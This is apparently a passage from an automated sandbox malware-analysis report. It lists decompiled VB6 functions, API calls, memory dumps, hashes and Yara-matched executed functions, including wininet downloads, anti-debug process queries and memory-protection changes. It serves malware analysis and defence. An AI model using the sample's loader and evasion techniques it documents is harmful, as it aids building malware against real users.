                  0x0040ef8f
                  0x0040ef94
                  0x0040ef99
                  0x0040ef9c
                  0x0040ef9f
                  0x0040efa4
                  0x0040efa4
                  0x0040efb0
                  0x0040efb5
                  0x0040efc8
                  0x0040efd0
                  0x0040efd5

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EEE7
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EEFF
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EF0A
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,004012A6), ref: 0040EF22
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF4F
                  • __vbaChkstk.MSVBVM60(?,00000000), ref: 0040EF68
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,0000017C), ref: 0040EF9F
                  • __vbaFreeObj.MSVBVM60 ref: 0040EFB0
                  • __vbaFreeVar.MSVBVM60(0040EFD6), ref: 0040EFC8
                  • __vbaFreeVar.MSVBVM60(0040EFD6), ref: 0040EFD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$Free$Chkstk$CheckHresultNew2
                  • String ID: Pt
                  • API String ID: 2096563423-3089937733
                  • Opcode ID: c5d88c32e3a4906ba1a900f2f66201febdc2e7ae4db930a0aeff1a3624b5e2f3
                  • Instruction ID: 8ca2f5a4e7a352638af0284ca2a6d4e4ea40d2a3f30cac5116863914f5c2030b
                  • Opcode Fuzzy Hash: c5d88c32e3a4906ba1a900f2f66201febdc2e7ae4db930a0aeff1a3624b5e2f3
                  • Instruction Fuzzy Hash: 2D310C70910208AFDB10EFD2D845BDDBBB5AF08708F60446AF401BB2E1C7BD6955DB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0040E77F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v28;
                  				signed int _v32;
                  				signed int _v44;
                  				signed int _t26;
                  				void* _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  
                  				_t40 = _t39 - 0xc;
                  				 *[fs:0x0] = _t40;
                  				L004012A0();
                  				_v16 = _t40;
                  				_v12 = 0x401230;
                  				_v8 = 0;
                  				_t26 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012a6, _t37);
                  				L00401420();
                  				_push(0);
                  				_push(0xffffffff);
                  				_push(1);
                  				_push(0);
                  				_push(0x40b168);
                  				_push(_v28);
                  				L00401366();
                  				L0040145C();
                  				_push(_v28);
                  				_push(0x40b170);
                  				L00401360();
                  				if(_t26 != 0) {
                  					_t26 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
                  					_v32 = _t26;
                  					if(_v32 >= 0) {
                  						_v44 = _v44 & 0x00000000;
                  					} else {
                  						_push(0x718);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v32);
                  						L004013D8();
                  						_v44 = _t26;
                  					}
                  				}
                  				_push(E0040E83F);
                  				L00401462();
                  				return _t26;
                  			}













                  0x0040e782
                  0x0040e791
                  0x0040e79b
                  0x0040e7a3
                  0x0040e7a6
                  0x0040e7ad
                  0x0040e7bc
                  0x0040e7c7
                  0x0040e7cc
                  0x0040e7ce
                  0x0040e7d0
                  0x0040e7d2
                  0x0040e7d4
                  0x0040e7d9
                  0x0040e7dc
                  0x0040e7e6
                  0x0040e7eb
                  0x0040e7ee
                  0x0040e7f3
                  0x0040e7fa
                  0x0040e804
                  0x0040e80a
                  0x0040e811
                  0x0040e82d
                  0x0040e813
                  0x0040e813
                  0x0040e818
                  0x0040e81d
                  0x0040e820
                  0x0040e823
                  0x0040e828
                  0x0040e828
                  0x0040e811
                  0x0040e831
                  0x0040e839
                  0x0040e83e

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E79B
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E7C7
                  • #712.MSVBVM60(?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7DC
                  • __vbaStrMove.MSVBVM60(?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7E6
                  • __vbaStrCmp.MSVBVM60(0040B170,?,?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E7F3
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401230,0040AD54,00000718), ref: 0040E823
                  • __vbaFreeStr.MSVBVM60(0040E83F,0040B170,?,?,0040B168,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E839
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$#712CheckChkstkCopyFreeHresultMove
                  • String ID: cer
                  • API String ID: 1147057769-324084633
                  • Opcode ID: 217c8a660729f025afb7e632096ff29c3c6335644ace3542bb9c3f98f6e23d6c
                  • Instruction ID: 919cfb5bc7367eb94ed625980aad82c460f18649fb504d447c6704233d38f523
                  • Opcode Fuzzy Hash: 217c8a660729f025afb7e632096ff29c3c6335644ace3542bb9c3f98f6e23d6c
                  • Instruction Fuzzy Hash: CF113A70940208ABDB00AFA6C846F9E7FB4EF04754F50807AF501BB2E1D77C5941CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E0040EFE9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v44;
                  				intOrPtr _v52;
                  				char _v60;
                  				char _v76;
                  				intOrPtr _v116;
                  				char _v124;
                  				short _v128;
                  				short _t30;
                  				short _t33;
                  				void* _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  
                  				_t40 = _t39 - 0xc;
                  				 *[fs:0x0] = _t40;
                  				L004012A0();
                  				_v16 = _t40;
                  				_v12 = 0x401288;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012a6, _t37);
                  				 *_a8 =  *_a8 & 0x00000000;
                  				_v52 = 0x20;
                  				_v60 = 2;
                  				_push( &_v60);
                  				_push(1);
                  				_push( &_v76);
                  				L0040133C();
                  				_v116 = 0x40b1f8;
                  				_v124 = 0x8008;
                  				_push( &_v76);
                  				_t30 =  &_v124;
                  				_push(_t30);
                  				L004013F0();
                  				_v128 = _t30;
                  				_push( &_v76);
                  				_push( &_v60);
                  				_push(2);
                  				L00401432();
                  				_t33 = _v128;
                  				if(_t33 != 0) {
                  					_push(0x42);
                  					L00401336();
                  					_v44 = _t33;
                  				}
                  				_push(E0040F0C0);
                  				return _t33;
                  			}


















                  0x0040efec
                  0x0040effb
                  0x0040f005
                  0x0040f00d
                  0x0040f010
                  0x0040f017
                  0x0040f026
                  0x0040f02c
                  0x0040f02f
                  0x0040f036
                  0x0040f040
                  0x0040f041
                  0x0040f046
                  0x0040f047
                  0x0040f04c
                  0x0040f053
                  0x0040f05d
                  0x0040f05e
                  0x0040f061
                  0x0040f062
                  0x0040f067
                  0x0040f06e
                  0x0040f072
                  0x0040f073
                  0x0040f075
                  0x0040f07d
                  0x0040f083
                  0x0040f085
                  0x0040f087
                  0x0040f08c
                  0x0040f08c
                  0x0040f08f
                  0x00000000

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F005
                  • #607.MSVBVM60(?,00000001,00000002), ref: 0040F047
                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F062
                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F075
                  • #570.MSVBVM60(00000042,?,?,004012A6), ref: 0040F087
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __vba$#570#607ChkstkFreeList
                  • String ID:
                  • API String ID: 1644359802-3916222277
                  • Opcode ID: 9c0205df95720f175c2858b1f563e4fcca3c15fb55040717ea60e9c40e41a146
                  • Instruction ID: 50c39619844336a050a2371089a7c28eb76d73e92f075d033616882efe5f5ad2
                  • Opcode Fuzzy Hash: 9c0205df95720f175c2858b1f563e4fcca3c15fb55040717ea60e9c40e41a146
                  • Instruction Fuzzy Hash: 1511B9B1900208ABDB10DFE5C846BDEBBB8FF04744F50417AF904FB692D77895498B99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: wininet.dll
                  • API String ID: 2994545307-3354682871
                  • Opcode ID: 16f269681e764c592b752724ac3072896f054db6e9d5b22b3ef760ad6485cea0
                  • Instruction ID: 05f48ffd8c9c336f459d507f1973525c9576148e4be8878290f6ce71e834e9ae
                  • Opcode Fuzzy Hash: 16f269681e764c592b752724ac3072896f054db6e9d5b22b3ef760ad6485cea0
                  • Instruction Fuzzy Hash: FB01B632690701CFC710DAF4CC876C137E0AB07318B3D869885648B225F6AF62B58B86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InternetOpenA.WININET(012132E4,00000000,00000000,00000000,00000000), ref: 01212D4B
                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01212DD7
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InternetOpen
                  • String ID:
                  • API String ID: 2038078732-0
                  • Opcode ID: 6cda7b0bde7c5795b966707a813945f20dc042889e023d4ca8f4092383a50d4d
                  • Instruction ID: 378886008fda796626520e076577c5df2f2fc61f01283c4cf2aa67abdedda82b
                  • Opcode Fuzzy Hash: 6cda7b0bde7c5795b966707a813945f20dc042889e023d4ca8f4092383a50d4d
                  • Instruction Fuzzy Hash: 3D317E3025028BEFEB34CE14CD42FFE3AE5AF24340F648525BE0EAA198D77195449B10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: fd01225522cb96142988643e802517d5df111cc3aa413f62ea7e0871550a8928
                  • Instruction ID: 58c8f1d86a5ccfcebf169e07122f5e105022942f25348a5601997edc4d584534
                  • Opcode Fuzzy Hash: fd01225522cb96142988643e802517d5df111cc3aa413f62ea7e0871550a8928
                  • Instruction Fuzzy Hash: B4316231660706CFDB15CEB8C88679473E1AF57328F5D46E9CA118B165E3BE9190CB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 4a784aefbd5b9b3f2930d8c32229f56cdbe7f11837a84c9f416592b52c9b6516
                  • Instruction ID: 7258950092286aed04e12617bbae4604af6d91111bd3d2e59549bdf83e5f3bb6
                  • Opcode Fuzzy Hash: 4a784aefbd5b9b3f2930d8c32229f56cdbe7f11837a84c9f416592b52c9b6516
                  • Instruction Fuzzy Hash: 7F316231660706CFDB15CEB8C88679473E1AB57328F5D46E8C6148B165E3BE9190CBC2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 0d0c8f65bf891c8fcbd3996fee12b23a3503c7ecbed04ca7d79e48c7b1fd8d93
                  • Instruction ID: 46137204ea060816d814e57e70091f19b39f698f6a9bb7d52ca787c444642d85
                  • Opcode Fuzzy Hash: 0d0c8f65bf891c8fcbd3996fee12b23a3503c7ecbed04ca7d79e48c7b1fd8d93
                  • Instruction Fuzzy Hash: 5621D83063470A8FEB16DE68C448764B6D3ABA7334F5942B9CA1186599E37884C4CB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: ddc394d03b7476133eb28d92618c5d5ae68da9ab92806b681dcd77b1aa95948d
                  • Instruction ID: 3db3f169acdb0737a7efdf6cbf58824ca922f90a2d88e7c810196b9200484f1b
                  • Opcode Fuzzy Hash: ddc394d03b7476133eb28d92618c5d5ae68da9ab92806b681dcd77b1aa95948d
                  • Instruction Fuzzy Hash: D9214131620706CFDB15CEA8C84579477E2AB57328F5D52E9C6248B165E3BE91D0CBC2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 0ad5ad5cec1718c47752366c3548aa653e9789a477296b49e535d0f13f7361be
                  • Instruction ID: 7d11fea50d3f581210be2040d6d9ac0d27c39ccd9c257a5d52edcb989892e120
                  • Opcode Fuzzy Hash: 0ad5ad5cec1718c47752366c3548aa653e9789a477296b49e535d0f13f7361be
                  • Instruction Fuzzy Hash: 60213031660706CFDB15CEB8C88679073E1AB57328F5D46E9C5208B165F3BE9190CB83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtQueryInformationProcess.NTDLL ref: 01215949
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InformationProcessQuery
                  • String ID:
                  • API String ID: 1778838933-0
                  • Opcode ID: 41542db823fda1b047a6b4eacd225efcc20e81e67d05b5cdf1c934babbc6b040
                  • Instruction ID: fc52db586d03128509c3d8870093323f7dbd797ea48d6441b60876a55a9ce3c4
                  • Opcode Fuzzy Hash: 41542db823fda1b047a6b4eacd225efcc20e81e67d05b5cdf1c934babbc6b040
                  • Instruction Fuzzy Hash: EA11EF31660706CFDB25CEA8C88679077E2AB53328F5D45E9C6508B165E3BE91D4CB83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,01215045,00000040,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012153BF
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0121417D: LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  • LdrInitializeThunk.NTDLL ref: 01213398
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeLibraryLoadThunk
                  • String ID: $W$0={,$wininet.dll
                  • API String ID: 3353482560-3341375924
                  • Opcode ID: 98de3d1fceb00725b6c213d1fd9391c9bb809f99096fdfeffc681eada0398f39
                  • Instruction ID: dbbfbea0007fe8d84c983b6b9eb9c6473028a7383120ba5a637f45f45eb1bfb8
                  • Opcode Fuzzy Hash: 98de3d1fceb00725b6c213d1fd9391c9bb809f99096fdfeffc681eada0398f39
                  • Instruction Fuzzy Hash: 0EE107B165024ADFEB20EF24CC81BE93BE2BF74344F648118FE495B298C7B49491CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 1FFE6BB0
                  • GetCurrentThread.KERNEL32 ref: 1FFE6BED
                  • GetCurrentProcess.KERNEL32 ref: 1FFE6C2A
                  • GetCurrentThreadId.KERNEL32 ref: 1FFE6C83
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: e807e2d41fce7a0c482854efb18f733554ba8757c2b6ebc6e4bf16a699b7badb
                  • Instruction ID: 2fa818350b56a95f4603428ba7cc7ecb860ab272adf30112dcd3ca8280352a85
                  • Opcode Fuzzy Hash: e807e2d41fce7a0c482854efb18f733554ba8757c2b6ebc6e4bf16a699b7badb
                  • Instruction Fuzzy Hash: C95125B0D046498FEB14CFA9C988BDEBBF1FF49315F208459E019A7360D7B96880CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: wininet.dll
                  • API String ID: 2994545307-3354682871
                  • Opcode ID: d2c0e53003341bd516599b97f96a327b9d86af7a5e39f8d9e4e22f0c723b79f4
                  • Instruction ID: 27389ed43cb021ac7b9c41be6f6950a91fb860642447ad591362501fb3195681
                  • Opcode Fuzzy Hash: d2c0e53003341bd516599b97f96a327b9d86af7a5e39f8d9e4e22f0c723b79f4
                  • Instruction Fuzzy Hash: DAD0A73005D2C985C311F354017AA637B915B70234BFEC18E84C10662F8E405656E3CE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1FFE52A2
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 3a437d82abda08037f776cae23ae57d4cbcebbacfb8c9bcb389170a1e3404872
                  • Instruction ID: 9b0078479f552c5535bfb190fb9d7b16e227b7f853b24dd23c354decb2c6e34e
                  • Opcode Fuzzy Hash: 3a437d82abda08037f776cae23ae57d4cbcebbacfb8c9bcb389170a1e3404872
                  • Instruction Fuzzy Hash: A251E2B1C103199FDB14CF99C884ADEFBB1BF88314F25852AE419AB210D7B5A845CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1FFE52A2
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 11c4e904773ad18cfe8bebfb588cd0e60d10be3f6684fed3de71d2b17f1f6fa8
                  • Instruction ID: 1656ded1690f33d4ce6002c2d0771744499a84e442313cf4949c3fd8640c820c
                  • Opcode Fuzzy Hash: 11c4e904773ad18cfe8bebfb588cd0e60d10be3f6684fed3de71d2b17f1f6fa8
                  • Instruction Fuzzy Hash: 4241CFB1D103199FDB14CF99C884ADEFBB5BF88314F25812AE819AB210D7B5A845CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 1FFE7CF9
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: CallProcWindow
                  • String ID:
                  • API String ID: 2714655100-0
                  • Opcode ID: c56058a23498f58e05e741930b83c24975fba8001af7304a996666fce86892a6
                  • Instruction ID: 6a7991ca30e9508e7a34f872b3b7e92db126ebe0037207a7e58159abe2528226
                  • Opcode Fuzzy Hash: c56058a23498f58e05e741930b83c24975fba8001af7304a996666fce86892a6
                  • Instruction Fuzzy Hash: BC414AB5A00349CFDB14CF99C484BAABBF5FF88314F258559E519AB321D375A841CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.475060551.00000000201A0000.00000040.00000001.sdmp, Offset: 201A0000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 902e870c56c66e7afdd4c29afa0f37c5139d884752a061713e7b2d441ec68496
                  • Instruction ID: c22707137232368d7570eaf9fe7374ffa6b62270af7a8abdd9dce394c90fc871
                  • Opcode Fuzzy Hash: 902e870c56c66e7afdd4c29afa0f37c5139d884752a061713e7b2d441ec68496
                  • Instruction Fuzzy Hash: 7C3112B4D006598FDB14CFA9C885BDEFBB1BF08314F108529E815AB380D7759986CF82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.475060551.00000000201A0000.00000040.00000001.sdmp, Offset: 201A0000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 56d558f545ade64af4581b9ae88984c5492292064eb863bc93ff615d86bbe04d
                  • Instruction ID: 42ea22f7fde835a17e1672c7d42be56b3096e2cbf291b7fe91120455be6e394f
                  • Opcode Fuzzy Hash: 56d558f545ade64af4581b9ae88984c5492292064eb863bc93ff615d86bbe04d
                  • Instruction Fuzzy Hash: F43111B4D002598FDB14CFA9C885BDEFBF1BB08314F10852AE815A7380D7799982CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 01211A9D
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: TerminateThread
                  • String ID:
                  • API String ID: 1852365436-0
                  • Opcode ID: 3b4144d033d27a5df1692bc7329864690e31420b6c29f7d2abacb1b20996161a
                  • Instruction ID: 059850b71bf0eb4b6554e5f3d377219e078f969b726127be712c364c819ede04
                  • Opcode Fuzzy Hash: 3b4144d033d27a5df1692bc7329864690e31420b6c29f7d2abacb1b20996161a
                  • Instruction Fuzzy Hash: 1F217471650301DFDB10CFB4CCC6B9537E0EB26324F790291EA118B2E5E2BAA591CA56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01212DD7
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: InternetOpen
                  • String ID:
                  • API String ID: 2038078732-0
                  • Opcode ID: 01d33dc5bd823d35085bd04ecd1b309acf23b3427f241c94700815a8d5633fca
                  • Instruction ID: a5e9cb876626c031afb226d01b8d109d0ce46902372c0ce002bc9c43904a8de0
                  • Opcode Fuzzy Hash: 01d33dc5bd823d35085bd04ecd1b309acf23b3427f241c94700815a8d5633fca
                  • Instruction Fuzzy Hash: 5B213D31250346DFEB30CEA4CD82BE937E5AB15344F284528EE198A2A4E7B6A6509B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FFE6DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: ae2e33dc85332cf93f2b2e8dce4f34d618aee41ed925ac090e6951c3bb47387e
                  • Instruction ID: 3ae5a283badd77cf63342cdc9449cdeb80a161977ca3155aaf643828fe9ecb63
                  • Opcode Fuzzy Hash: ae2e33dc85332cf93f2b2e8dce4f34d618aee41ed925ac090e6951c3bb47387e
                  • Instruction Fuzzy Hash: FB2112B59002589FDB10CFA9D884AEEBFF5FF48314F10841AE859A3350D378A951CFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 186805a68d9bf6e551874e30da087e9e6d6c800473967f30ad7daf3e530ccce9
                  • Instruction ID: 66fc8efdadc2cf1ffeec7ff45d6c665b9a7b18d3c0d66011f7c0eaffbcaad26c
                  • Opcode Fuzzy Hash: 186805a68d9bf6e551874e30da087e9e6d6c800473967f30ad7daf3e530ccce9
                  • Instruction Fuzzy Hash: 5411F871970682DBCB10FBF4DC877E533D09B26318F284669D959C7118E3AB51924A87
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FFE6DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.474576607.000000001FFE0000.00000040.00000001.sdmp, Offset: 1FFE0000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 71a88ac25bf320ffbfd4956f423404ad0ed0c7571b157cdb5c7353de5b10bbd5
                  • Instruction ID: 48b0ae33748ce251b4ba97791ca7fd2ee17c0b59d1b06338bfaa7fb5ea98de96
                  • Opcode Fuzzy Hash: 71a88ac25bf320ffbfd4956f423404ad0ed0c7571b157cdb5c7353de5b10bbd5
                  • Instruction Fuzzy Hash: 3121E2B59002589FDB10CFAAD884ADEFBF4FB48314F10841AE919A3350D379A951CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNEL32(?,321C9581,?,01214FC7,01211D72,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0121433C
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: df0ff8451b8efc392b588dcef3c5264496d453945b07b04ef9126568147d74cf
                  • Instruction ID: a259d2498a7f037022852328e41cd7fc9bf2520afca25dc415e1588e3fba8d93
                  • Opcode Fuzzy Hash: df0ff8451b8efc392b588dcef3c5264496d453945b07b04ef9126568147d74cf
                  • Instruction Fuzzy Hash: 4D115D71970782DBCF20FBF4DC477E533E09B36318F240669D959C6118E3EA52924947
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 01211A9D
                  Memory Dump Source
                  • Source File: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Offset: 01211000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: TerminateThread
                  • String ID:
                  • API String ID: 1852365436-0
                  • Opcode ID: 03483e9a080ff38d47d8c70e029c77ba00c0802351a7552a0162c0b8bdd365ce
